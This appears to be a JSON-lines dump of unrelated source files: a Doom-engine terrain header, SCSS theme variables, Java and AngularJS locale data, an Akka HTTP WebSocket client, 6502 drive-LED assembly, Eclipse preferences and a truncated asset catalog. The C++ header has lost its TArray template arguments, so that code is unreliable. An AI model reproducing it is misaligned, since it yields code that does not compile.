The name of the author may not be used to endorse or promote products\r\n** derived from this software without specific prior written permission.\r\n**\r\n** THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\r\n** IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\r\n** OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\r\n** IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,\r\n** INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\r\n** NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\r\n** DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\r\n** THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\r\n** THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n**---------------------------------------------------------------------------\r\n**\r\n*/\r\n\r\n#ifndef __P_TERRAIN_H__\r\n#define __P_TERRAIN_H__\r\n\r\n#include \"s_sound.h\"\r\n#include \"textures/textures.h\"\r\n\r\nstruct PClass;\r\n\r\nextern WORD DefaultTerrainType;\r\n\r\n\r\nclass FTerrainTypeArray\r\n{\r\npublic:\r\n\tTArray Types;\r\n\r\n\tWORD operator [](FTextureID tex) const\r\n\t{\r\n\t\tif ((unsigned)tex.GetIndex() >= Types.Size()) return DefaultTerrainType;\r\n\t\tWORD type = Types[tex.GetIndex()];\r\n\t\treturn type == 0xffff? DefaultTerrainType : type;\r\n\t}\r\n\tWORD operator [](int texnum) const\r\n\t{\r\n\t\tif ((unsigned)texnum >= Types.Size()) return DefaultTerrainType;\r\n\t\tWORD type = Types[texnum];\r\n\t\treturn type == 0xffff? DefaultTerrainType : type;\r\n\t}\r\n\tvoid Resize(unsigned newsize)\r\n\t{\r\n\t\tTypes.Resize(newsize);\r\n\t}\r\n\tvoid Clear()\r\n\t{\r\n\t\tmemset (&Types[0], 0xff, Types.Size()*sizeof(WORD));\r\n\t}\r\n\tvoid Set(int index, int value)\r\n\t{\r\n\t\tif ((unsigned)index >= Types.Size())\r\n\t\t{\r\n\t\t\tint oldsize = Types.Size();\r\n\t\t\tResize(index + 1);\r\n\t\t\tmemset(&Types[oldsize], 0xff, (index + 1 - oldsize)*sizeof(WORD));\r\n\t\t}\r\n\t\tTypes[index] = value;\r\n\t}\r\n};\r\n\r\nextern FTerrainTypeArray TerrainTypes;\r\n\r\n// at game start\r\nvoid P_InitTerrainTypes ();\r\n\r\nstruct FSplashDef\r\n{\r\n\tFName Name;\r\n\tFSoundID SmallSplashSound;\r\n\tFSoundID NormalSplashSound;\r\n\tconst PClass *SmallSplash;\r\n\tconst PClass *SplashBase;\r\n\tconst PClass *SplashChunk;\r\n\tBYTE ChunkXVelShift;\r\n\tBYTE ChunkYVelShift;\r\n\tBYTE ChunkZVelShift;\r\n\tfixed_t ChunkBaseZVel;\r\n\tfixed_t SmallSplashClip;\r\n\tbool NoAlert;\r\n};\r\n\r\nstruct FTerrainDef\r\n{\r\n\tFName Name;\r\n\tint Splash;\r\n\tint DamageAmount;\r\n\tFName DamageMOD;\r\n\tint DamageTimeMask;\r\n\tfixed_t FootClip;\r\n\tfloat StepVolume;\r\n\tint WalkStepTics;\r\n\tint RunStepTics;\r\n\tFSoundID LeftStepSound;\r\n\tFSoundID RightStepSound;\r\n\tbool IsLiquid;\r\n\tbool AllowProtection;\r\n\tfixed_t Friction;\r\n\tfixed_t MoveFactor;\r\n};\r\n\r\nextern TArray Splashes;\r\nextern TArray Terrains;\r\n\r\nclass FArchive;\r\nint P_FindTerrain(FName name);\r\nvoid P_SerializeTerrain(FArchive &arc, int &terrainnum);\r\n\r\n#endif //__P_TERRAIN_H__\r\n"} {"text": "// ┌───────────┐\n// │ Variables │\n// └───────────┘\n//\n// Main variables\n\n@import \"color-variables\"; // Calcite color variables\n\n// ---------------------------------------------------------------\n// UI\n// 
---------------------------------------------------------------\n\n$base_ui_margin: 15px !default;\n$base_ui_position_absolute: 15px !default;\n$base_ui_font_size: 14px;\n\n// ---------------------------------------------------------------\n// Media breaks\n// ---------------------------------------------------------------\n\n// Width - Devices including iPad portrait\n$base_breakpoint_max_width_xxs: 320px;\n$base_breakpoint_max_width_xs: 544px;\n$base_breakpoint_max_width_sm: 768px;\n\n// Height - Devices smaller than iPad landscape\n$base_breakpoint_min_height_xxs: 320px;\n$base_breakpoint_min_height_xs: 544px;\n$base_breakpoint_min_height_sm: 767px;\n$base_breakpoint_min_height_md: 992px;\n\n// ---------------------------------------------------------------\n// Map\n// ---------------------------------------------------------------\n\n$map_fixed_width: 768px !default;\n$map_fixed_height: 500px !default;\n$map_attribution_height: 16px !default; \n\n// ---------------------------------------------------------------\n// Navbar\n// ---------------------------------------------------------------\n\n// Size\n$navbar_height: 50px !default; // small 50px, medium 60px, large 85px\n$navbar_margin: $base_ui_margin !default;\n// Nav\n$navbar_nav_li_a_padding: 15px 15px !default;\n$navbar_nav_font_size: $base_ui_font_size;\n// Menu dropdown toggle\n$navbar_dropdown_toggle_margin: 0;\n$navbar_dropdown_toggle_padding: 17px 20px 19px 22px !default;\n$navbar_dropdown_toggle_padding_mobile: 17px 18px 19px 20px !default;\n$navbar_dropdown_toggle_icon_bar_height: 14px !default;\n$navbar_dropdown_toggle_icon_bar_width: 17px !default;\n// Brand\n$navbar_brand_padding: 10px 15px !default;\n$navbar_brand_font_size: 32px !default;\n// Title - main\n$navbar_title_margin: 0 !default;\n$navbar_title_padding: 1px 0 2px !default;\n$navbar_title_font_size: 22px !default;\n$navbar_title_font_weight: 400;\n$navbar_title_font_size_mobile: 20px !default;\n// Title - divider\n$navbar_title_divider_margin: 0 15px;\n// Title - sub\n$navbar_subtitle_margin: 0 !default;\n$navbar_subtitle_padding: 1px 0 0 !default;\n$navbar_subtitle_font_size: 13px !default;\n$navbar_subtitle_font_weight: 400 !default;\n$navbar_subtitle_font_size_mobile: 12px !default;\n// Breakpoints\n$navbar_breakpoint_width_mobile: $base_breakpoint_max_width_sm !default;\n\n// ---------------------------------------------------------------\n// Dropdown\n// ---------------------------------------------------------------\n\n$dropdown_menu_padding: 0;\n$dropdown_menu_li_a_padding: 9px 15px;\n$dropdown_toggle_font_size: $base_ui_font_size !default;\n$dropdown_menu_font_size: $base_ui_font_size !default;\n// Size\n$dropdown_menu_max_height: 500px;\n$dropdown_menu_max_height_mobile: 215px !default;\n// Breakpoints\n$dropdown_breakpoint_height_mobile: $base_breakpoint_min_height_sm !default;\n$dropdown_breakpoint_width_mobile: $base_breakpoint_max_width_sm !default;\n\n// ---------------------------------------------------------------\n// Panel\n// ---------------------------------------------------------------\n\n// Position\n$panels_position_top: $base_ui_position_absolute;\n$panels_position_right: $base_ui_position_absolute;\n$panels_position_left: $base_ui_position_absolute;\n// Size\n$panels_width: auto;\n$panels_width_mobile: 100% !default;\n$panel_title_height: 33px !default; // controls minimized size\n// Body\n$panel_body_width: 350px !default; // controls width of all panels\n$panel_body_width_mobile: 100% !default; // full width in 
mobile\n$panel_body_min_height: 50px !default;\n$panel_body_max_height: 500px !default; // default\n// Only use half of the height available\n$panel_body_height_xxs: $base_breakpoint_min_height_xxs / 2 !default; \n$panel_body_height_xs: $base_breakpoint_min_height_xs / 2 !default;\n$panel_body_height_sm: $base_breakpoint_min_height_sm / 2 !default;\n$panel_body_height_md: $base_breakpoint_min_height_md / 2 !default;\n// Optional - Perform max height calculations (nav - title - margin)\n// $panel_space: $navbar_height + 38px + $base_ui_margin; \n$panel_body_max_height_expanded: 125px !default;\n// Font\n$panel_font_size: 13px !default;\n$panel_title_font_size: 14px !default;\n$panel_title_font_weight: 400 !default;\n// Form elements\n$panel_form_control_height: 34px !default;\n// Breakpoints\n$panels_breakpoint_width_mobile: $base_breakpoint_max_width_sm !default;\n$panels_breakpoint_height_xxs: $base_breakpoint_min_height_xxs !default;\n$panels_breakpoint_height_xs: $base_breakpoint_min_height_xs !default;\n$panels_breakpoint_height_sm: $base_breakpoint_min_height_sm !default;\n$panels_breakpoint_height_md: $base_breakpoint_min_height_md !default;\n\n// ---------------------------------------------------------------\n// Theme - All\n// ---------------------------------------------------------------\n\n$navbar_decoration_trans_percentage: 96% !default;\n$navbar_decoration_color_height: 2px !default;\n$theme_all_navbar_opacity: 0.75;\n\n// ---------------------------------------------------------------\n// Theme - Light (light background, dark text)\n// ---------------------------------------------------------------\n\n// Navbar\n$theme_light_navbar_bg: $Calcite_Gray_050;\n$theme_light_navbar_text_color: $Calcite_Gray_700;\n$theme_light_navbar_text_color_hover: $Calcite_True_Black;\n$theme_light_navbar_decoration_color: $Calcite_Gray_700;\n$theme_light_navbar_text_color_disabled: $Calcite_Gray_550;\n$theme_light_navbar_text_color_secondary: $Calcite_Gray_600;\n// Dropdown\n$theme_light_dropdown_menu_bg: $Calcite_Gray_050;\n$theme_light_dropdown_menu_bg_hover: $Calcite_Gray_150;\n$theme_light_dropdown_menu_text_color: $Calcite_Gray_650;\n$theme_light_dropdown_menu_border_color: $Calcite_Gray_100;\n$theme_light_dropdown_menu_shadow:\t\t\t\t1px 1px 1px 0 rgba(0,0,0,.1);\n// Panel\n$theme_light_panel_bg: $Calcite_Gray_050;\n$theme_light_panel_text_color: $Calcite_Gray_650;\n$theme_light_panel_header_text_color: $Calcite_Gray_600;\n$theme_light_panel_header_close_color:\t\t\t\t$Calcite_Gray_500;\n$theme_light_panel_header_text_color_hover: $Calcite_Gray_700;\n$theme_light_panel_header_bg: $Calcite_Gray_150;\n$theme_light_panel_header_bg_hover: $Calcite_Gray_200;\n$theme_light_panel_header_bg_active: $Calcite_Gray_200;\n$theme_light_panel_border_color: $Calcite_Gray_250;\n$theme_light_panel_decoration_color:\t\t\t\t\t$Calcite_Gray_650;\n// Panel - Controls\n$theme_light_control_bg: \t$Calcite_Gray_050;\n$theme_light_control_bg_hover: \t$Calcite_Gray_200;\n$theme_light_control_bg_active: \t$Calcite_Gray_050;\n$theme_light_control_text_color: \t$Calcite_Gray_650;\n$theme_light_control_text_color_hover: \t$Calcite_Gray_700;\n$theme_light_control_text_color_disabled: $Calcite_Gray_550;\n$theme_light_control_border_color: \t$Calcite_Gray_450;\n$theme_light_control_border_color_hover:\t$Calcite_Gray_700;\n// Panel - Anchors\n$theme_light_link_color: inherit;\n$theme_light_link_color_hover: inherit;\n\n// ---------------------------------------------------------------\n// Theme - Dark (dark background, 
light text)\n// ---------------------------------------------------------------\n\n// Navbar\n$theme_dark_navbar_bg: $Calcite_Gray_300_Dark;\n$theme_dark_navbar_text_color: $Calcite_Gray_050;\n$theme_dark_navbar_text_color_hover: $Calcite_True_White;\n$theme_dark_navbar_decoration_color:\t\t$Calcite_Gray_050;\n$theme_dark_navbar_text_color_disabled: $Calcite_Gray_250;\n$theme_dark_navbar_text_color_secondary: $Calcite_Gray_100;\n// Dropdown\n$theme_dark_dropdown_menu_bg: \t$Calcite_Gray_100_Dark;\n$theme_dark_dropdown_menu_bg_hover: \t$Calcite_Gray_300_Dark;\n$theme_dark_dropdown_menu_text_color:\t\t\t$Calcite_Gray_050;\n$theme_dark_dropdown_menu_border_color: \t$Calcite_Gray_100_Dark;\n$theme_dark_dropdown_menu_shadow:\t\t\t\t\t1px 1px 1px 0 rgba(0,0,0,.1);\n// Panel\n$theme_dark_panel_bg: $Calcite_Gray_300_Dark;\n$theme_dark_panel_text_color: $Calcite_Gray_050; \n$theme_dark_panel_header_text_color: $Calcite_Gray_050;\n$theme_dark_panel_header_close_color:\t\t\t\t$Calcite_Gray_050;\n$theme_dark_panel_header_text_color_hover: $Calcite_True_White;\n$theme_dark_panel_header_bg: $Calcite_Gray_300_Dark;\n$theme_dark_panel_header_bg_hover: $Calcite_Gray_350_Dark;\n$theme_dark_panel_header_bg_active: $Calcite_Gray_400_Dark;\n$theme_dark_panel_border_color: $Calcite_Gray_300_Dark;\n$theme_dark_panel_decoration_color:\t\t\t\t\t$Calcite_Gray_650_Dark;\n// Panel - Controls\n$theme_dark_control_bg: $Calcite_Gray_100_Dark; \n$theme_dark_control_bg_hover: $Calcite_Gray_100_Dark;\n$theme_dark_control_bg_active: $Calcite_Gray_100_Dark;\n$theme_dark_control_text_color: $Calcite_Gray_050;\n$theme_dark_control_text_color_hover: $Calcite_True_White;\n$theme_dark_control_text_color_disabled: $Calcite_Gray_250;\n$theme_dark_control_border_color: $Calcite_Gray_400_Dark;\n$theme_dark_control_border_color_hover:\t$Calcite_Gray_050;\n// Panel - Anchors\n$theme_dark_link_color: $Calcite_Highlight_Blue_350_Dark;\n$theme_dark_link_color_hover: $Calcite_Highlight_Blue_400_Dark;\n\n// ---------------------------------------------------------------\n// Theme - Custom (single color backgrounds, light or dark text)\n// ---------------------------------------------------------------\n\n// Navbar\n$theme_custom_navbar_bg: \t\t\t\t\t\t\t\t\tinherit;\n// Dropdown Menu\n$theme_custom_dropdown_menu_bg: \t\t\t\t\tinherit;\n$theme_custom_dropdown_menu_bg_hover: \t\trgba(255,255,255,0.15);\n$theme_custom_dropdown_menu_shadow:\t\t\t\t1px 1px 1px 0 rgba(0,0,0,0.1);\n// Panel\n$theme_custom_panel_bg: \t\t\t\t\t\t\t\t\tinherit;\n$theme_custom_panel_header_bg: \t\t\t\t\t\ttransparent; //rgba(255,255,255,0); //rgba(255,255,255,0.15);\n$theme_custom_panel_header_bg_hover: \t\t\trgba(255,255,255,0.25);\n$theme_custom_panel_header_bg_active: \t\tinherit;\n// Panel - Controls\n$theme_custom_panel_control_bg: \t\t\t\t\tinherit;\n$theme_custom_panel_control_bg_hover: \t\tinherit;\n$theme_custom_panel_control_bg_active: \t\tinherit;\n$theme_custom_panel_control_border_color:\trgba(255,255,255,0.35);\n$theme_custom_panel_tab_shadow_top:\t\t\t\t0 -2px 0 0;\n\n\n\n"} {"text": "/*\n * Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. 
Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\n/*\n * COPYRIGHT AND PERMISSION NOTICE\n *\n * Copyright (C) 1991-2012 Unicode, Inc. All rights reserved. Distributed under\n * the Terms of Use in http://www.unicode.org/copyright.html.\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of the Unicode data files and any associated documentation (the \"Data\n * Files\") or Unicode software and any associated documentation (the\n * \"Software\") to deal in the Data Files or Software without restriction,\n * including without limitation the rights to use, copy, modify, merge,\n * publish, distribute, and/or sell copies of the Data Files or Software, and\n * to permit persons to whom the Data Files or Software are furnished to do so,\n * provided that (a) the above copyright notice(s) and this permission notice\n * appear with all copies of the Data Files or Software, (b) both the above\n * copyright notice(s) and this permission notice appear in associated\n * documentation, and (c) there is clear notice in each modified Data File or\n * in the Software as well as in the documentation associated with the Data\n * File(s) or Software that the data or software has been modified.\n *\n * THE DATA FILES AND SOFTWARE ARE PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY\n * KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF\n * THIRD PARTY RIGHTS. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS\n * INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR\n * CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,\n * DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER\n * TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE\n * OF THE DATA FILES OR SOFTWARE.\n *\n * Except as contained in this notice, the name of a copyright holder shall not\n * be used in advertising or otherwise to promote the sale, use or other\n * dealings in these Data Files or Software without prior written authorization\n * of the copyright holder.\n */\n\n// Note: this file has been generated by a tool.\n\npackage sun.text.resources.en;\n\nimport sun.util.resources.OpenListResourceBundle;\n\npublic class JavaTimeSupplementary_en extends OpenListResourceBundle {\n @Override\n protected final Object[][] getContents() {\n return new Object[][] {\n { \"QuarterAbbreviations\",\n new String[] {\n \"Q1\",\n \"Q2\",\n \"Q3\",\n \"Q4\",\n }\n },\n { \"QuarterNames\",\n new String[] {\n \"1st quarter\",\n \"2nd quarter\",\n \"3rd quarter\",\n \"4th quarter\",\n }\n },\n { \"calendarname.buddhist\",\n \"Buddhist Calendar\" },\n { \"calendarname.gregorian\",\n \"Gregorian Calendar\" },\n { \"calendarname.gregory\",\n \"Gregorian Calendar\" },\n { \"calendarname.islamic\",\n \"Islamic Calendar\" },\n { \"calendarname.islamic-civil\",\n \"Islamic-Civil Calendar\" },\n { \"calendarname.islamicc\",\n \"Islamic-Civil Calendar\" },\n { \"calendarname.japanese\",\n \"Japanese Calendar\" },\n { \"calendarname.roc\",\n \"Minguo Calendar\" },\n { \"field.dayperiod\",\n \"AM/PM\" },\n { \"field.era\",\n \"Era\" },\n { \"field.hour\",\n \"Hour\" },\n { \"field.minute\",\n \"Minute\" },\n { \"field.month\",\n \"Month\" },\n { \"field.second\",\n \"Second\" },\n { \"field.week\",\n \"Week\" },\n { \"field.weekday\",\n \"Day of the Week\" },\n { \"field.year\",\n \"Year\" },\n { \"field.zone\",\n \"Time Zone\" },\n { \"islamic.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y GGGG\",\n \"MMMM d, y GGGG\",\n \"MMM d, y GGGG\",\n \"M/d/yy GGGG\",\n }\n },\n { \"java.time.buddhist.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy GGGGG\",\n }\n },\n { \"java.time.islamic.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy G\",\n }\n },\n { \"java.time.japanese.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy GGGGG\",\n }\n },\n { \"java.time.long.Eras\",\n new String[] {\n \"Before Christ\",\n \"Anno Domini\",\n }\n },\n { \"java.time.roc.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy GGGGG\",\n }\n },\n { \"java.time.short.Eras\",\n new String[] {\n \"BC\",\n \"AD\",\n }\n },\n { \"roc.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y GGGG\",\n \"MMMM d, y GGGG\",\n \"MMM d, y GGGG\",\n \"M/d/yy G\",\n }\n },\n };\n }\n}\n"} {"text": "'use strict';\nangular.module(\"ngLocale\", [], [\"$provide\", function($provide) {\nvar PLURAL_CATEGORY = {ZERO: \"zero\", ONE: \"one\", TWO: \"two\", FEW: \"few\", MANY: \"many\", OTHER: \"other\"};\n$provide.value(\"$locale\", {\n \"DATETIME_FORMATS\": {\n \"AMPMS\": [\n \"AM\",\n \"PM\"\n ],\n \"DAY\": [\n \"dimanche\",\n \"lundi\",\n \"mardi\",\n \"mercredi\",\n \"jeudi\",\n \"vendredi\",\n \"samedi\"\n ],\n \"MONTH\": [\n \"janvier\",\n 
\"f\\u00e9vrier\",\n \"mars\",\n \"avril\",\n \"mai\",\n \"juin\",\n \"juillet\",\n \"ao\\u00fbt\",\n \"septembre\",\n \"octobre\",\n \"novembre\",\n \"d\\u00e9cembre\"\n ],\n \"SHORTDAY\": [\n \"dim.\",\n \"lun.\",\n \"mar.\",\n \"mer.\",\n \"jeu.\",\n \"ven.\",\n \"sam.\"\n ],\n \"SHORTMONTH\": [\n \"janv.\",\n \"f\\u00e9vr.\",\n \"mars\",\n \"avr.\",\n \"mai\",\n \"juin\",\n \"juil.\",\n \"ao\\u00fbt\",\n \"sept.\",\n \"oct.\",\n \"nov.\",\n \"d\\u00e9c.\"\n ],\n \"fullDate\": \"EEEE d MMMM y\",\n \"longDate\": \"d MMMM y\",\n \"medium\": \"d MMM y HH:mm:ss\",\n \"mediumDate\": \"d MMM y\",\n \"mediumTime\": \"HH:mm:ss\",\n \"short\": \"dd/MM/yy HH:mm\",\n \"shortDate\": \"dd/MM/yy\",\n \"shortTime\": \"HH:mm\"\n },\n \"NUMBER_FORMATS\": {\n \"CURRENCY_SYM\": \"\\u20ac\",\n \"DECIMAL_SEP\": \",\",\n \"GROUP_SEP\": \"\\u00a0\",\n \"PATTERNS\": [\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"macFrac\": 0,\n \"maxFrac\": 3,\n \"minFrac\": 0,\n \"minInt\": 1,\n \"negPre\": \"-\",\n \"negSuf\": \"\",\n \"posPre\": \"\",\n \"posSuf\": \"\"\n },\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"macFrac\": 0,\n \"maxFrac\": 2,\n \"minFrac\": 2,\n \"minInt\": 1,\n \"negPre\": \"(\",\n \"negSuf\": \"\\u00a0\\u00a4)\",\n \"posPre\": \"\",\n \"posSuf\": \"\\u00a0\\u00a4\"\n }\n ]\n },\n \"id\": \"fr-ga\",\n \"pluralCat\": function (n) { if (n >= 0 && n <= 2 && n != 2) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}\n});\n}]);"} {"text": "/*\n * Copyright (C) 2009-2020 Lightbend Inc. \n */\n\npackage akka.http.impl.engine.ws\n\nimport akka.NotUsed\nimport akka.annotation.InternalApi\nimport akka.http.scaladsl.model.ws._\n\nimport scala.concurrent.{ Future, Promise }\nimport akka.util.ByteString\nimport akka.event.LoggingAdapter\nimport akka.stream.stage._\nimport akka.stream._\nimport akka.stream.TLSProtocol._\nimport akka.stream.scaladsl._\nimport akka.http.scaladsl.settings.ClientConnectionSettings\nimport akka.http.scaladsl.Http\nimport akka.http.scaladsl.model.{ HttpMethods, HttpResponse }\nimport akka.http.scaladsl.model.headers.Host\nimport akka.http.impl.engine.parsing.HttpMessageParser.StateResult\nimport akka.http.impl.engine.parsing.ParserOutput.{ MessageStartError, NeedMoreData, RemainingBytes, ResponseStart }\nimport akka.http.impl.engine.parsing.{ HttpHeaderParser, HttpResponseParser, ParserOutput }\nimport akka.http.impl.engine.rendering.{ HttpRequestRendererFactory, RequestRenderingContext }\nimport akka.http.impl.engine.ws.Handshake.Client.NegotiatedWebSocketSettings\nimport akka.http.impl.util.LogByteStringTools\nimport akka.http.impl.util.{ SingletonException, StreamUtils }\nimport akka.stream.impl.fusing.GraphStages.SimpleLinearGraphStage\n\nimport scala.collection.immutable\n\n/** INTERNAL API */\n@InternalApi\nprivate[http] object WebSocketClientBlueprint {\n /**\n * Returns a WebSocketClientLayer that can be materialized once.\n */\n def apply(\n request: WebSocketRequest,\n settings: ClientConnectionSettings,\n log: LoggingAdapter): Http.WebSocketClientLayer =\n LogByteStringTools.logTLSBidiBySetting(\"client-plain-text\", settings.logUnencryptedNetworkBytes).reversed\n .atop(simpleTls)\n .atopMat(handshake(request, settings, log))(Keep.right)\n .atop(WebSocket.framing)\n .atop(WebSocket.stack(serverSide = false, settings.websocketSettings, log = log))\n .reversed\n\n /**\n * A bidi flow that injects and inspects the WS handshake and then goes out of the way. 
This BidiFlow\n * can only be materialized once.\n */\n def handshake(\n request: WebSocketRequest,\n settings: ClientConnectionSettings,\n log: LoggingAdapter): BidiFlow[ByteString, ByteString, ByteString, ByteString, Future[WebSocketUpgradeResponse]] = {\n import request._\n val result = Promise[WebSocketUpgradeResponse]()\n\n val valve = StreamUtils.OneTimeValve()\n\n val subprotocols: immutable.Seq[String] = subprotocol.toList.flatMap(_.split(\",\")).map(_.trim)\n val (initialRequest, key) = Handshake.Client.buildRequest(uri, extraHeaders, subprotocols, settings.websocketRandomFactory())\n val hostHeader = Host(uri.authority.normalizedFor(uri.scheme))\n val renderedInitialRequest =\n HttpRequestRendererFactory.renderStrict(RequestRenderingContext(initialRequest, hostHeader), settings, log)\n\n class UpgradeStage extends SimpleLinearGraphStage[ByteString] {\n\n override def createLogic(attributes: Attributes): GraphStageLogic =\n new GraphStageLogic(shape) with InHandler with OutHandler {\n // a special version of the parser which only parses one message and then reports the remaining data\n // if some is available\n val parser: HttpResponseParser = new HttpResponseParser(settings.parserSettings, HttpHeaderParser(settings.parserSettings, log)) {\n var first = true\n override def handleInformationalResponses = false\n override protected def parseMessage(input: ByteString, offset: Int): StateResult = {\n if (first) {\n try {\n // If we're called recursively then that's a next message\n first = false\n super.parseMessage(input, offset)\n } catch {\n // Specifically NotEnoughDataException, but that's not visible here\n case t: SingletonException => {\n // If parsing the first message fails, retry and treat it like the first message again.\n first = true\n throw t\n }\n }\n } else {\n emit(RemainingBytes(input.drop(offset)))\n terminate()\n }\n }\n }\n parser.setContextForNextResponse(HttpResponseParser.ResponseContext(HttpMethods.GET, None))\n\n override def onPush(): Unit = {\n parser.parseBytes(grab(in)) match {\n case NeedMoreData => pull(in)\n case ResponseStart(status, protocol, headers, entity, close) =>\n val response = HttpResponse(status, headers, protocol = protocol)\n Handshake.Client.validateResponse(response, subprotocols, key) match {\n case Right(NegotiatedWebSocketSettings(protocol)) =>\n result.success(ValidUpgrade(response, protocol))\n\n setHandler(in, new InHandler {\n override def onPush(): Unit = push(out, grab(in))\n })\n valve.open()\n\n val parseResult = parser.onPull()\n require(parseResult == ParserOutput.MessageEnd, s\"parseResult should be MessageEnd but was $parseResult\")\n parser.onPull() match {\n case NeedMoreData => pull(in)\n case RemainingBytes(bytes) => push(out, bytes)\n case other =>\n throw new IllegalStateException(s\"unexpected element of type ${other.getClass}\")\n }\n case Left(problem) =>\n result.success(InvalidUpgradeResponse(response, s\"WebSocket server at $uri returned $problem\"))\n failStage(new IllegalArgumentException(s\"WebSocket upgrade did not finish because of '$problem'\"))\n }\n case MessageStartError(statusCode, errorInfo) =>\n throw new IllegalStateException(s\"Message failed with status code $statusCode; Error info: $errorInfo\")\n case other =>\n throw new IllegalStateException(s\"unexpected element of type ${other.getClass}\")\n }\n }\n\n override def onPull(): Unit = pull(in)\n\n setHandlers(in, out, this)\n\n override def onUpstreamFailure(ex: Throwable): Unit = {\n result.tryFailure(new RuntimeException(\"Connection 
failed.\", ex))\n super.onUpstreamFailure(ex)\n }\n }\n\n override def toString = \"UpgradeStage\"\n }\n\n BidiFlow.fromGraph(GraphDSL.create() { implicit b =>\n import GraphDSL.Implicits._\n\n val networkIn = b.add(Flow[ByteString].via(new UpgradeStage))\n val wsIn = b.add(Flow[ByteString])\n\n val handshakeRequestSource = b.add(Source.single(renderedInitialRequest) ++ valve.source)\n val httpRequestBytesAndThenWSBytes = b.add(Concat[ByteString]())\n\n handshakeRequestSource ~> httpRequestBytesAndThenWSBytes\n wsIn.outlet ~> httpRequestBytesAndThenWSBytes\n\n BidiShape(\n networkIn.in,\n networkIn.out,\n wsIn.in,\n httpRequestBytesAndThenWSBytes.out)\n }) mapMaterializedValue (_ => result.future)\n }\n\n def simpleTls: BidiFlow[SslTlsInbound, ByteString, ByteString, SendBytes, NotUsed] =\n BidiFlow.fromFlowsMat(\n Flow[SslTlsInbound].collect { case SessionBytes(_, bytes) => bytes },\n Flow[ByteString].map(SendBytes))(Keep.none)\n}\n"} {"text": "\t.page 'leds' \n;\n;turn on activity led specified\n; by drvnum\n;\nsetlds sei \n lda #$ff-led1-led0 \n and ledprt \n pha \n\n lda drvnum \n beq leds0 \n pla \n ora #led1 \n bne leds1 \nleds0 \n pla \n ora #led0 \nleds1 \n sta ledprt \n cli \n rts \n;\nledson sei \n lda #led1+led0 \n ora ledprt \n sta ledprt \n cli \n rts \n;\nerroff \n lda #0 \n sta erword \n sta erled \n rts \n;\nerron sei \n txa \n pha ; save .x\n lda #80 \n sta erword \n ldx #0 \n;lda drvnum ;for 2 drives\n;and #1\n;tax\n lda ledmsk,x \n sta erled \n ora ledprt ; set led on\n sta ledprt \n pla \n tax ; restore .x\n cli \n rts \n; .end\n"} {"text": "eclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compiler.codegen.targetPlatform=1.8\norg.eclipse.jdt.core.compiler.compliance=1.8\norg.eclipse.jdt.core.compiler.problem.assertIdentifier=error\norg.eclipse.jdt.core.compiler.problem.enumIdentifier=error\norg.eclipse.jdt.core.compiler.problem.forbiddenReference=warning\norg.eclipse.jdt.core.compiler.source=1.8\n"} {"text": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"2x\",\n \"filename\" : 